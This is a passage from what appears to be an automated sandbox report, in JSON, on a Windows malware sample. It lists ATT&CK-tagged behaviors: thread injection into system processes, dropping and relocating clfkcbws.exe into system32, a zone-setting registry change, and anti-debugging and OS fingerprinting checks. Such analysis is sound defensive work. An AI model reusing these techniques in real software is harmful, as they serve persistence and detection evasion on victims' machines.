creates a thread in process \"-1\" (Handle: 4294967295)\n \"sc.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"clfkcbws.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"netsh.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"svchost.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" reads file \"c:\\308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\"\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" reads file \"c:\\users\\%osuser%\\desktop\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\DELEGATEFOLDERS\"; Key: \"\"; Value: \"\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\"; Key: \"\"; Value: \"\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\"; Key: \"\"; Value: \"\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\"; Key: \"\"; Value: \"\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\"; Key: \"\"; Value: \"\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{11016101-E366-4D22-BC06-4ADA335C892B}\"; Key: \"\"; Value: \"\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\"; Key: \"\"; Value: \"\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\"; Key: \"\"; Value: \"\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\DELEGATEFOLDERS\"; Key: \"\"; Value: \"\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SESSIONINFO\\1\"; Key: \"\"; Value: \"\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SESSIONINFO\\1\\DESKTOP\\NAMESPACE\"; Key: \"\"; Value: \"\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SESSIONINFO\\1\\DESKTOP\\NAMESPACE\\DELEGATEFOLDERS\"; Key: \"\"; Value: \"\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"\"; Value: \"\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"\"; Value: \"\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\COM3\"; Key: \"\"; Value: \"\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\"; Key: \"\"; Value: \"\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\"; Key: \"\"; Value: \"\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\TREATAS\"; Key: \"\"; Value: \"\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\TREATAS\"; Key: \"\"; Value: \"\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\PROGID\"; Key: \"\"; Value: \"\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\PROGID\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" trying to touch file \"C:\\dbghelp.dll\"\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" trying to touch file \"C:\\Windows\\system32\\dbghelp.dll\"\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" trying to touch file \"C:\\msvcr100.dll\"\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" trying to touch file \"C:\\Windows\\system32\\msvcr100.dll\"\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" trying to touch file \"pipe\\uqyipjlp\"\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" trying to touch file \"C:\\\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-12", "type": 6, "relevance": 4, "name": "Monitors specific registry key for changes", "description": "\"netsh.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\Control\\NetworkProvider\\HwOrder\" (Filter: 4; Subtree: 0)\n \"netsh.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\Protocol_Catalog9\" (Filter: 1; Subtree: 0)\n \"netsh.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\NameSpace_Catalog5\" (Filter: 1; Subtree: 0)\n \"netsh.exe\" monitors \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\" (Filter: 5; Subtree: 1)\n \"svchost.exe\" monitors \"\\REGISTRY\\USER\\.DEFAULT\\Control Panel\\International\" (Filter: 4; Subtree: 1)\n \"svchost.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\Protocol_Catalog9\" (Filter: 1; Subtree: 0)\n \"svchost.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\NameSpace_Catalog5\" (Filter: 1; Subtree: 0)", "origin": "API Call", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" trying to access non-existent file \"pipe\\uqyipjlp\"\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" trying to access non-existent file \"C:\\308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe.Local\\\"\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" trying to access non-existent file \"C:\\Windows\\System32\\cmd.exe:Zone.Identifier\"\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" trying to access non-existent file \"C:\\Windows\\System32\\sc.exe:Zone.Identifier\"\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" trying to access non-existent file \"C:\\Windows\\System32\\netsh.exe:Zone.Identifier\"\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" trying to access non-existent file \"C:\\308041C7EC841B30A3E2BC6FAAF475372A6306962AF84CF26424656D52DCA739.EXE.LOCAL\"\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" trying to access non-existent file \"C:\\Windows\\System32\\cmd.exe:ZONE.IDENTIFIER\"\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" trying to access non-existent file \"C:\\Windows\\System32\\sc.exe:ZONE.IDENTIFIER\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" connecting to \"\\ThemeApiPort\"\n \"netsh.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\clfkcbws.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Caches\"\n \"svchost.exe\" touched file \"C:\\Windows\\system32\\config\\systemprofile:.repos\"\n \"svchost.exe\" touched file \"C:\\Windows\\system32\\config\\systemprofile\\Local Settings:.repos\"\n \"svchost.exe\" touched file \"C:\\Windows\\TEMP\\wincookie.repos\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{11016101-E366-4D22-BC06-4ADA335C892B}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"\"; Value: \"\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"LOADWITHOUTCOM\"; Value: \"\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\COM3\"; Key: \"COM+ENABLED\"; Value: \"\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\"; Key: \"\"; Value: \"\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"INPROCSERVER32\"; Value: \"\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"THREADINGMODEL\"; Value: \"\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"MAXSXSHASHCOUNT\"; Value: \"\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\INTERNET EXPLORER\\EUPP PROTECTED - IT IS A VIOLATION OF WINDOWS POLICY TO MODIFY. SEE AKA.MS/BROWSERPOLICY\"; Key: \"FIRSTRUNCOMPLETE\"; Value: \"\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\DATACOLLECTION\"; Key: \"COMMERCIALDATAOPTIN\"; Value: \"\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"CREATEURICACHESIZE\"; Value: \"\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"CREATEURICACHESIZE\"; Value: \"\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"CREATEURICACHESIZE\"; Value: \"\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"CREATEURICACHESIZE\"; Value: \"\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"ENABLEPUNYCODE\"; Value: \"\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"ENABLEPUNYCODE\"; Value: \"\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"ENABLEPUNYCODE\"; Value: \"\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"SECURITY_HKLM_ONLY\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"clfkcbws.exe.67B73C0E.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"clfkcbws.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\clfkcbws.exe]- [targetUID: 00000000-00004536]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-162", "type": 6, "relevance": 1, "name": "Renames files", "description": "\"cmd.exe\" renamed original file\"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\clfkcbws.exe\" to \"%WINDIR%\\system32\\njrbicei\\clfkcbws.exe\"", "origin": "API Call", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-9", "type": 6, "relevance": 4, "name": "Queries process information", "description": "\"netsh.exe\" queried SystemProcessInformation at 00000000-00005336-00000105-214633 [PID: 5336]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00005336-00000105-589932 [PID: 5336]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00005336-00000105-1653540 [PID: 5336]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00005336-00000105-1925625 [PID: 5336]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00005336-00000105-2488955 [PID: 5336]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00005336-00000105-2721115 [PID: 5336]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00005336-00000105-3768534 [PID: 5336]\n \"svchost.exe\" queried SystemProcessInformation at 00000000-00000364-00000105-129883 [PID: 364]", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "registry-179", "type": 3, "relevance": 1, "name": "Tries to map intranet network resources to internet zone", "description": "\"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")", "origin": "Registry Access", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "module-16", "type": 10, "relevance": 3, "name": "Loads the debugger/analysis tool module", "description": "\"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" loaded module \"%WINDIR%\\System32\\dbghelp.dll\" at 6FA40000\n \"clfkcbws.exe\" loaded module \"%WINDIR%\\System32\\dbghelp.dll\" at 6FA40000\n \"svchost.exe\" loaded module \"%WINDIR%\\System32\\dbghelp.dll\" at 6FA40000", "origin": "Loaded Module", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-10", "type": 6, "relevance": 6, "name": "Queries kernel debugger information", "description": "\"netsh.exe\" at 00000000-00005336-00000105-6436122", "origin": "API Call", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-39", "type": 6, "relevance": 8, "name": "Queries volume information of an entire harddrive", "description": "\"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" queries volume information of \"C:\\\" at 00000000-00004536-0000010C-1302743\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" queries volume information of \"C:\\\" at 00000000-00004536-0000010C-1304065\n \"clfkcbws.exe\" queries volume information of \"C:\\\" at 00000000-00005112-0000010C-2663049\n \"clfkcbws.exe\" queries volume information of \"C:\\\" at 00000000-00005112-0000010C-2664818\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00000364-0000010C-72951\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00000364-0000010C-765724\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00000364-0000010C-1412682\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00000364-0000010C-1414290", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001c5cb8774379cc75ffffffff0c0000004c62b8771f79cc75ffffffff0c00000064ec120004000000000400000100000078ec12000a0e2b0000000000 (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b203100720600000088eaba76ecf91200b3446f7288000000000000000000000000000000000000000000000000000000880000000000000000000000000000002c6b4000497c574bbcf51200616b400088000000f822410081a8ba76ecf9120000009001007ee400000200000800000038c75e00 (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8ebef75b02d22000080fd7f9a5cba7700e0fd7fb0c969014480fd7f00000000400000003f000000250000000080fd7fa4c96901c15cba776082c177250000000080fd7f9a5cba7700e0fd7fc8c969015789b9778083c1771317cd75d8ebef75 (UID: 00000000-00004536)\n \"clfkcbws.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000c8a931003cfc2400145cb977435cb97708fd24000100000094012f0001000000bcfb2400935cba774083c177d4a0b9777ac6d17708fd2400010000000100000090dd3100000000008cfb2400bcfb240028fc240095e1b5773e394c00feffffffd4a0b9771bbecc7500007f7600000000 (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001c5cb8774379cc75ffffffff0c0000004c62b8771f79cc75ffffffff0c00000064ec120004000000000400000100000078ec12000a0e150000000000 (UID: 00000000-00005112)\n \"netsh.exe\" called \"GetVersionExA\" with parameter 